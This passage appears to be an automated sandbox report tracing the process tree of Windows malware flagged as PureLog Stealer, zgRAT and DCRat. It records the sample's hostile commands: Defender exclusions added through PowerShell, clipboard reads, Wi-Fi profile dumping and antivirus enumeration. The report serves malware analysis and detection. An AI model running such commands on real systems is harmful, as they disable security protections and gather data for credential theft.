                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\ProgramData\svchost.exe"
                                                                                                                                                                              Imagebase:0x660000
                                                                                                                                                                              File size:4'042'529 bytes
                                                                                                                                                                              MD5 hash:45C59202DCE8ED255B4DBD8BA74C630F
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 61%, ReversingLabs
                                                                                                                                                                              • Detection: 53%, Virustotal, Browse
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:04:57:21
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:32
                                                                                                                                                                              Start time:04:57:22
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:33
                                                                                                                                                                              Start time:04:57:22
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:34
                                                                                                                                                                              Start time:04:57:22
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2
                                                                                                                                                                              Imagebase:0x7ff617a20000
                                                                                                                                                                              File size:380'720 bytes
                                                                                                                                                                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:35
                                                                                                                                                                              Start time:04:57:22
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:36
                                                                                                                                                                              Start time:04:57:22
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:37
                                                                                                                                                                              Start time:04:57:23
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                                              File size:147'456 bytes
                                                                                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:38
                                                                                                                                                                              Start time:04:57:23
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                              Imagebase:0x7ff645830000
                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:39
                                                                                                                                                                              Start time:04:57:23
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                              Imagebase:0x7ff645830000
                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:40
                                                                                                                                                                              Start time:04:57:25
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:41
                                                                                                                                                                              Start time:04:57:25
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:42
                                                                                                                                                                              Start time:04:57:25
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                                                                                              Imagebase:0x300000
                                                                                                                                                                              File size:3'720'704 bytes
                                                                                                                                                                              MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:43
                                                                                                                                                                              Start time:04:57:26
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\setup.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\ProgramData\setup.exe"
                                                                                                                                                                              Imagebase:0x7ff799470000
                                                                                                                                                                              File size:5'617'152 bytes
                                                                                                                                                                              MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 71%, ReversingLabs
                                                                                                                                                                              • Detection: 79%, Virustotal, Browse
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:44
                                                                                                                                                                              Start time:04:57:26
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:45
                                                                                                                                                                              Start time:04:57:26
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:48
                                                                                                                                                                              Start time:04:57:28
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:49
                                                                                                                                                                              Start time:04:57:28
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:50
                                                                                                                                                                              Start time:04:57:28
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:51
                                                                                                                                                                              Start time:04:57:28
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                              Imagebase:0x7ff7360c0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:52
                                                                                                                                                                              Start time:04:57:31
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:53
                                                                                                                                                                              Start time:04:57:33
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:54
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:55
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:56
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:57
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:58
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:59
                                                                                                                                                                              Start time:04:57:34
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:60
                                                                                                                                                                              Start time:04:57:35
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                              Imagebase:0x7ff750d20000
                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:61
                                                                                                                                                                              Start time:04:57:35
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                              Imagebase:0x7ff645830000
                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:62
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
